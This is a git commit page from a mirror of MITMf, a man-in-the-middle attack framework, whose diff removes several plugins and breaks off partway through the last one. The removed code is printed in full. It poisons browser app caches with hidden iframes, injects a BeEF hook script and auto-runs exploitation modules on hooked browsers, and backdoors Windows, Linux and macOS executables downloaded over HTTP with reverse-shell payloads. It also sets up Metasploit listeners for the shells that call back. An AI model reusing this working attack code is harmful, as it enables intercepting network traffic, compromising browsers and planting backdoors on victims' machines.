mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-14 02:37:06 -07:00
This is 1/2 of the work done... lots of cool stuff!
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as opposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as opposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unreliable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is of no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so I removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inherits from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
This commit is contained in:
parent
663f38e732
commit
9712eed4a3
92 changed files with 6883 additions and 3349 deletions
|
@ -1,207 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||
|
||||
import logging
|
||||
import re
|
||||
import os.path
|
||||
import time
|
||||
import sys
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from datetime import date
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class AppCachePlugin(Plugin):
    """Performs HTML5 Application Cache poisoning.

    Tampered pages are given a cache manifest with a ~10 year lifetime so the
    victim's browser keeps serving the poisoned content long after the MITM
    position is lost.  Behaviour is driven by the [AppCachePoison] config
    section, which is re-read on every request so edits apply live.
    """

    name = "App Cache Poison"
    optname = "appoison"
    desc = "Performs App Cache Poisoning attacks"
    implements = ["handleResponse"]
    version = "0.3"
    has_opts = False

    def initialize(self, options):
        """Called when the plugin is enabled; hooks us into the URL monitor."""
        self.options = options
        self.mass_poisoned_browsers = []
        self.urlMonitor = URLMonitor.getInstance()

        self.urlMonitor.setAppCachePoisoning()

    def handleResponse(self, request, data):
        """Inspect every proxied response and poison it when its URL matches a
        configured section; otherwise attempt opportunistic mass poisoning.

        Returns a dict with the (possibly modified) request and body data.
        """
        self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison']  # so we reload the config on each request

        url = request.client.uri
        req_headers = request.client.getAllHeaders()
        headers = request.client.responseHeaders
        ip = request.client.getClientIP()

        #########################################################################

        # Optionally restrict tampering to browsers whose UA matches a regex.
        if "enable_only_in_useragents" in self.config:
            regexp = self.config["enable_only_in_useragents"]
            if regexp and not re.search(regexp, req_headers["user-agent"]):
                mitmf_logger.info("%s Tampering disabled in this useragent (%s)", ip, req_headers["user-agent"])
                return {'request': request, 'data': data}

        urls = self.urlMonitor.getRedirectionSet(url)
        mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s", ip, urls)
        (name, s, element, url) = self.getSectionForUrls(urls)

        if s is False:
            # URL not covered by any config section: fall back to mass poisoning.
            data = self.tryMassPoison(url, data, headers, req_headers, ip)
            return {'request': request, 'data': data}

        mitmf_logger.info("%s Found URL %s in section %s", ip, url, name)
        p = self.getTemplatePrefix(s)

        if element == 'tamper':
            mitmf_logger.info("%s Poisoning tamper URL with template %s", ip, p)
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)

            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to body
                data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)

            # add manifest reference so the browser caches the poisoned page
            data = re.sub(re.compile("<html", re.IGNORECASE), "<html manifest=\"" + self.getManifestUrl(s) + "\"", data)

        elif element == "manifest":
            mitmf_logger.info("%s Poisoning manifest URL", ip)
            data = self.getSpoofedManifest(url, s)
            headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

        elif element == "raw":  # raw resource to modify, it does not have to be html
            mitmf_logger.info("%s Poisoning raw URL", ip)
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)

            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to response body
                data += appendix

        self.cacheForFuture(headers)
        self.removeDangerousHeaders(headers)
        return {'request': request, 'data': data}

    def tryMassPoison(self, url, data, headers, req_headers, ip):
        """Inject invisible iframes (one per tamper URL) into a generic HTML
        response so the browser fetches — and caches — every poisoned page.

        Each browser (ip + user-agent) is only mass-poisoned once.
        """
        browser_id = ip + req_headers.get("user-agent", "")

        if 'mass_poison_url_match' not in self.config:  # no url
            return data
        if browser_id in self.mass_poisoned_browsers:  # already poisoned
            return data
        if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]):  # not HTML
            return data
        # FIX: the UA filter is only applied when configured; the original code
        # read self.config['mass_poison_useragent_match'] unconditionally and
        # raised KeyError whenever that option was absent from the config.
        if 'mass_poison_useragent_match' in self.config:
            if "user-agent" not in req_headers:
                return data
            if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']):  # different UA
                return data
        if not re.search(self.config['mass_poison_url_match'], url):  # different url
            return data

        mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s", url, browser_id)
        appendix = self.getMassPoisonHtml()
        data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
        self.mass_poisoned_browsers.append(browser_id)  # mark to avoid mass spoofing for this ip
        return data

    def getMassPoisonHtml(self):
        """Build an off-screen <div> of hidden iframes, one per configured
        tamper URL (sections may opt out via skip_in_mass_poison)."""
        html = "<div style=\"position:absolute;left:-100px\">"
        for i in self.config:
            if isinstance(self.config[i], dict):
                if 'tamper_url' in self.config[i] and not self.config[i].get('skip_in_mass_poison', False):
                    html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"

        return html + "</div>"

    def cacheForFuture(self, headers):
        """Rewrite caching headers so the response stays 'fresh' for ~10 years."""
        ten_years = 315569260  # seconds
        headers.setRawHeaders("Cache-Control", ["max-age=" + str(ten_years)])
        headers.setRawHeaders("Last-Modified", ["Mon, 29 Jun 1998 02:28:12 GMT"])  # it was modifed long ago, so is most likely fresh
        in_ten_years = date.fromtimestamp(time.time() + ten_years)
        headers.setRawHeaders("Expires", [in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

    def removeDangerousHeaders(self, headers):
        """Strip headers that would stop our iframes from loading."""
        headers.removeHeader("X-Frame-Options")

    def getSpoofedManifest(self, url, section):
        """Return the poisoned cache manifest for *section*, falling back to
        the default template when the section has no .manifest file."""
        p = self.getTemplatePrefix(section)
        if not os.path.exists(p + '.manifest'):
            p = self.getDefaultTemplatePrefix()

        with open(p + '.manifest', 'r') as f:
            manifest = f.read()
        return self.decorate(manifest, section)

    def decorate(self, content, section):
        """Substitute every %%key%% placeholder in *content* with the
        corresponding value from the config *section*."""
        for i in section:
            content = content.replace("%%" + i + "%%", section[i])
        return content

    def getTemplatePrefix(self, section):
        """Path prefix (no extension) of the templates for *section*."""
        if 'templates' in section:
            return self.config['templates_path'] + '/' + section['templates']

        return self.getDefaultTemplatePrefix()

    def getDefaultTemplatePrefix(self):
        """Path prefix of the fallback 'default' template set."""
        return self.config['templates_path'] + '/default'

    def getManifestUrl(self, section):
        """Manifest URL to advertise; defaults to /robots.txt (always cacheable)."""
        return section.get("manifest_url", '/robots.txt')

    def getSectionForUrls(self, urls):
        """Find the first config section matching any URL in *urls*.

        Returns (section_name, section_dict, element_kind, url) where
        element_kind is 'tamper', 'manifest' or 'raw'; when nothing matches,
        returns (None, False, '', some_url) as the sentinel.
        """
        for url in urls:
            for i in self.config:
                if isinstance(self.config[i], dict):  # section
                    section = self.config[i]
                    name = i

                    if section.get('tamper_url', False) == url:
                        return (name, section, 'tamper', url)

                    if 'tamper_url_match' in section and re.search(section['tamper_url_match'], url):
                        return (name, section, 'tamper', url)

                    if section.get('manifest_url', False) == url:
                        return (name, section, 'manifest', url)

                    if section.get('raw_url', False) == url:
                        return (name, section, 'raw', url)

        return (None, False, '', urls.copy().pop())
|
||||
|
||||
|
|
@ -1,131 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import sys
|
||||
import json
|
||||
import threading
|
||||
|
||||
from core.beefapi.beefapi import BeefAPI
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from time import sleep
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class BeefAutorun(Inject, Plugin, ConfigWatcher):
    """Injects the BeEF hook into proxied pages (via the Inject plugin) and
    polls the BeEF REST API in the background, autorunning configured BeEF
    modules against hooked browsers based on their OS and browser type."""

    name = "BeEFAutorun"
    optname = "beefauto"
    desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
    tree_output = []
    depends = ["Inject"]
    version = "0.3"
    has_opts = False

    def initialize(self, options):
        """Set up injection, log in to BeEF, and start the autorun poller."""
        self.options = options
        self.ip_address = SystemConfig.getIP(options.interface)

        # let Inject set up its own state (payload injection machinery)
        Inject.initialize(self, options)

        # perform the initial config read / BeEF login
        self.onConfigChange()

        # daemon thread so the poller dies with the main process
        t = threading.Thread(name="autorun", target=self.autorun, args=())
        t.setDaemon(True)
        t.start()

    def onConfigChange(self):
        """(Re)read the [MITMf][BeEF] config section and re-authenticate
        against the BeEF REST API; exits the process on login failure."""

        beefconfig = self.config['MITMf']['BeEF']

        # hook payload that Inject inserts into every proxied page
        self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])

        self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
        if not self.beef.login(beefconfig['user'], beefconfig['pass']):
            sys.exit("[-] Error logging in to BeEF!")

        self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))

    def autorun(self):
        """Background loop: watch BeEF for newly hooked sessions and run
        modules on them.  mode 'oneshot' runs modules once per session;
        mode 'loop' re-runs them on every pass (10 s apart)."""
        already_ran = []
        already_hooked = []

        while True:
            # re-read mode each pass so live config edits take effect
            mode = self.config['BeEFAutorun']['mode']
            sessions = self.beef.sessions_online()
            if (sessions is not None and len(sessions) > 0):
                for session in sessions:

                    if session not in already_hooked:
                        info = self.beef.hook_info(session)
                        mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
                        already_hooked.append(session)
                        # stop injecting into clients that are already hooked
                        # (black_ips is provided by the Inject base class)
                        self.black_ips.append(str(info['ip']))

                    if mode == 'oneshot':
                        if session not in already_ran:
                            self.execModules(session)
                            already_ran.append(session)

                    elif mode == 'loop':
                        self.execModules(session)
                        sleep(10)

            else:
                sleep(1)

    def execModules(self, session):
        """Run the configured generic ([ALL]) and OS/browser-targeted
        ([targets]) BeEF modules against a single hooked session."""
        session_info = self.beef.hook_info(session)
        session_ip = session_info['ip']
        hook_browser = session_info['name']
        hook_os = session_info['os']
        all_modules = self.config['BeEFAutorun']["ALL"]
        targeted_modules = self.config['BeEFAutorun']["targets"]

        if len(all_modules) > 0:
            mitmf_logger.info("{} >> sending generic modules".format(session_ip))
            # module options are stored as JSON strings in the config
            for module, options in all_modules.iteritems():
                mod_id = self.beef.module_id(module)
                resp = self.beef.module_run(session, mod_id, json.loads(options))
                if resp["success"] == 'true':
                    mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
                else:
                    mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
                # brief pause between modules so BeEF isn't flooded
                sleep(0.5)

        mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
        # 'os' here is an OS-name string from the config, not the os module
        for os in targeted_modules:
            # substring match allows e.g. config key 'Windows' to hit 'Windows 7'
            if (os in hook_os) or (os == hook_os):
                browsers = targeted_modules[os]
                if len(browsers) > 0:
                    for browser in browsers:
                        if browser == hook_browser:
                            modules = targeted_modules[os][browser]
                            if len(modules) > 0:
                                for module, options in modules.iteritems():
                                    mod_id = self.beef.module_id(module)
                                    resp = self.beef.module_run(session, mod_id, json.loads(options))
                                    if resp["success"] == 'true':
                                        mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
                                    else:
                                        mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
                                    sleep(0.5)
|
File diff suppressed because one or more lines are too long
|
@ -20,7 +20,6 @@
|
|||
|
||||
from plugins.plugin import Plugin
|
||||
|
||||
|
||||
class CacheKill(Plugin):
|
||||
name = "CacheKill"
|
||||
optname = "cachekill"
|
||||
|
|
|
@ -1,652 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||
#
|
||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
#
|
||||
# Copyright (c) 2013-2014, Joshua Pitts
|
||||
# All rights reserved.
|
||||
#
|
||||
# Redistribution and use in source and binary forms, with or without modification,
|
||||
# are permitted provided that the following conditions are met:
|
||||
#
|
||||
# 1. Redistributions of source code must retain the above copyright notice,
|
||||
# this list of conditions and the following disclaimer.
|
||||
#
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
#
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
# POSSIBILITY OF SUCH DAMAGE.
|
||||
#
|
||||
# Tested on Kali-Linux.
|
||||
|
||||
import sys
|
||||
import os
|
||||
import pefile
|
||||
import zipfile
|
||||
import logging
|
||||
import shutil
|
||||
import random
|
||||
import string
|
||||
import tarfile
|
||||
import multiprocessing
|
||||
import threading
|
||||
|
||||
from libs.bdfactory import pebin
|
||||
from libs.bdfactory import elfbin
|
||||
from libs.bdfactory import machobin
|
||||
from core.msfrpc import Msfrpc
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from plugins.plugin import Plugin
|
||||
from tempfile import mkstemp
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class FilePwn(Plugin, ConfigWatcher):
|
||||
name = "FilePwn"
|
||||
optname = "filepwn"
|
||||
desc = "Backdoor executables being sent over http using bdfactory"
|
||||
implements = ["handleResponse"]
|
||||
tree_output = ["BDFProxy v0.3.2 online"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
    '''Called if plugin is enabled, passed the options namespace'''
    self.options = options

    # queue for patched binaries handed back from binaryGrinder workers
    self.patched = multiprocessing.Queue()

    #FOR FUTURE USE
    self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']

    #FOR FUTURE USE
    self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']

    #USED NOW
    # magic-number signatures used to sniff the real file type of a response
    # body; 'offset' is where the signature lives in the byte stream.
    # NOTE: str.decode('hex') is Python 2 only.
    self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
                         'pe': {'number': 'MZ', 'offset': 0},
                         'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
                         'bz': {'number': 'BZ', 'offset': 0},
                         'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
                         'tar': {'number': 'ustar', 'offset': 257},
                         'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
                         'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
                         'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
                         }

    #NOT USED NOW
    #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))

    #FilePwn options (per-target patching settings from the [FilePwn] section)
    self.userConfig = self.config['FilePwn']
    self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
    self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
    self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
    self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
    self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
    self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
    self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
    self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
    self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
    self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
    self.zipblacklist = self.userConfig['ZIP']['blacklist']
    self.tarblacklist = self.userConfig['TAR']['blacklist']

    #Metasploit options
    msfcfg = self.config['MITMf']['Metasploit']
    rpcip = msfcfg['rpcip']
    rpcpass = msfcfg['rpcpass']

    try:
        msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
        msf.login('msf', rpcpass)
        version = msf.call('core.version')['version']
        self.tree_output.append("Connected to Metasploit v{}".format(version))
    except Exception:
        # MSGRPC unreachable / bad credentials: the plugin is useless without
        # handlers, so bail out of the whole process.
        sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")

    # start one multi/handler per configured payload, unless an identical
    # handler job is already running
    self.tree_output.append("Setting up Metasploit payload handlers")
    jobs = msf.call('job.list')
    for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
        cmd = "use exploit/multi/handler\n"
        cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
        cmd += "set LHOST {}\n".format(config["HOST"])
        cmd += "set LPORT {}\n".format(config["PORT"])
        cmd += "exploit -j\n"

        if jobs:
            for pid, name in jobs.iteritems():
                info = msf.call('job.info', [pid])
                if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
                    # NOTE(review): this starts a handler for EVERY job that
                    # doesn't match — presumably intended to start at most one
                    # when NO job matches; confirm against upstream behaviour.
                    #Create a virtual console
                    c_id = msf.call('console.create')['id']

                    #write the cmd to the newly created console
                    msf.call('console.write', [c_id, cmd])
        else:
            # no jobs running at all: start a handler for this payload
            #Create a virtual console
            c_id = msf.call('console.create')['id']

            #write the cmd to the newly created console
            msf.call('console.write', [c_id, cmd])
|
||||
|
||||
def onConfigChange(self):
    """Re-run initialize() so edits to the config file (payloads, ports,
    blacklists, Metasploit settings) take effect without restarting MITMf."""
    self.initialize(self.options)
|
||||
|
||||
def convert_to_Bool(self, aString):
    """Map the config strings 'true'/'false'/'none' (any case) to the Python
    values True/False/None; any other string also yields None."""
    mapping = {'true': True, 'false': False, 'none': None}
    return mapping.get(aString.lower())
|
||||
|
||||
def bytes_have_format(self, bytess, formatt):
    """Return True when *bytess* carries the magic-number signature that
    self.magicNumbers registers for file format *formatt*."""
    sig = self.magicNumbers[formatt]
    start = sig['offset']
    magic = sig['number']
    return bytess[start:start + len(magic)] == magic
|
||||
|
||||
def binaryGrinder(self, binaryFile):
    """
    Feed potential binaries into this function,
    it will return the result PatchedBinary, False, or None
    """
    # Sniffs the on-disk file's real type from its magic bytes, dispatches to
    # the matching backdoor-factory patcher (pebin / elfbin / machobin), and
    # puts the patch result onto self.patched for the caller to collect.
    # NOTE: Python 2 only — relies on str byte-strings, encode/decode('hex'),
    # and the print statement.

    with open(binaryFile, 'r+b') as f:
        binaryTMPHandle = f.read()

    binaryHeader = binaryTMPHandle[:4]
    result = None

    try:
        if binaryHeader[:2] == 'MZ':  # PE/COFF
            pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
            magic = pe.OPTIONAL_HEADER.Magic
            machineType = pe.FILE_HEADER.Machine

            #update when supporting more than one arch
            # 0x20B optional-header magic + 0x8664 machine => PE32+ (x64)
            if (magic == int('20B', 16) and machineType == 0x8664 and
                    self.WindowsType.lower() in ['all', 'x64']):
                add_section = False
                cave_jumping = False
                if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
                    add_section = True
                elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
                    cave_jumping = True

                # if automatic override
                if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
                    cave_jumping = True

                targetFile = pebin.pebin(FILE=binaryFile,
                                         OUTPUT=os.path.basename(binaryFile),
                                         SHELL=self.WindowsIntelx64['SHELL'],
                                         HOST=self.WindowsIntelx64['HOST'],
                                         PORT=int(self.WindowsIntelx64['PORT']),
                                         ADD_SECTION=add_section,
                                         CAVE_JUMPING=cave_jumping,
                                         IMAGE_TYPE=self.WindowsType,
                                         PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
                                         SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
                                         ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
                                         PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
                                         )

                result = targetFile.run_this()

            # 0x14c machine => 32-bit x86 PE
            elif (machineType == 0x14c and
                    self.WindowsType.lower() in ['all', 'x86']):
                add_section = False
                cave_jumping = False
                #add_section wins for cave_jumping
                #default is single for BDF
                if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
                    add_section = True
                elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
                    cave_jumping = True

                # if automatic override
                if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
                    cave_jumping = True

                targetFile = pebin.pebin(FILE=binaryFile,
                                         OUTPUT=os.path.basename(binaryFile),
                                         SHELL=self.WindowsIntelx86['SHELL'],
                                         HOST=self.WindowsIntelx86['HOST'],
                                         PORT=int(self.WindowsIntelx86['PORT']),
                                         ADD_SECTION=add_section,
                                         CAVE_JUMPING=cave_jumping,
                                         IMAGE_TYPE=self.WindowsType,
                                         PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
                                         SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
                                         ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
                                         PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
                                         )

                result = targetFile.run_this()

        elif binaryHeader[:4].encode('hex') == '7f454c46':  # ELF

            targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
            targetFile.support_check()

            if targetFile.class_type == 0x1:
                #x86CPU Type
                targetFile = elfbin.elfbin(FILE=binaryFile,
                                           OUTPUT=os.path.basename(binaryFile),
                                           SHELL=self.LinuxIntelx86['SHELL'],
                                           HOST=self.LinuxIntelx86['HOST'],
                                           PORT=int(self.LinuxIntelx86['PORT']),
                                           SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
                                           IMAGE_TYPE=self.LinuxType
                                           )
                result = targetFile.run_this()
            elif targetFile.class_type == 0x2:
                #x64
                targetFile = elfbin.elfbin(FILE=binaryFile,
                                           OUTPUT=os.path.basename(binaryFile),
                                           SHELL=self.LinuxIntelx64['SHELL'],
                                           HOST=self.LinuxIntelx64['HOST'],
                                           PORT=int(self.LinuxIntelx64['PORT']),
                                           SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
                                           IMAGE_TYPE=self.LinuxType
                                           )
                result = targetFile.run_this()

        elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']:  # Macho
            targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
            targetFile.support_check()

            #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE

            if targetFile.FAT_FILE is True:
                if self.FatPriority == 'x86':
                    targetFile = machobin.machobin(FILE=binaryFile,
                                                   OUTPUT=os.path.basename(binaryFile),
                                                   SHELL=self.MachoIntelx86['SHELL'],
                                                   HOST=self.MachoIntelx86['HOST'],
                                                   PORT=int(self.MachoIntelx86['PORT']),
                                                   SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
                                                   FAT_PRIORITY=self.FatPriority
                                                   )
                    result = targetFile.run_this()

                elif self.FatPriority == 'x64':
                    targetFile = machobin.machobin(FILE=binaryFile,
                                                   OUTPUT=os.path.basename(binaryFile),
                                                   SHELL=self.MachoIntelx64['SHELL'],
                                                   HOST=self.MachoIntelx64['HOST'],
                                                   PORT=int(self.MachoIntelx64['PORT']),
                                                   SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
                                                   FAT_PRIORITY=self.FatPriority
                                                   )
                    result = targetFile.run_this()

            # thin Mach-O: CPU type 0x7 = i386
            elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
                targetFile = machobin.machobin(FILE=binaryFile,
                                               OUTPUT=os.path.basename(binaryFile),
                                               SHELL=self.MachoIntelx86['SHELL'],
                                               HOST=self.MachoIntelx86['HOST'],
                                               PORT=int(self.MachoIntelx86['PORT']),
                                               SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
                                               FAT_PRIORITY=self.FatPriority
                                               )
                result = targetFile.run_this()

            # thin Mach-O: CPU type 0x1000007 = x86_64
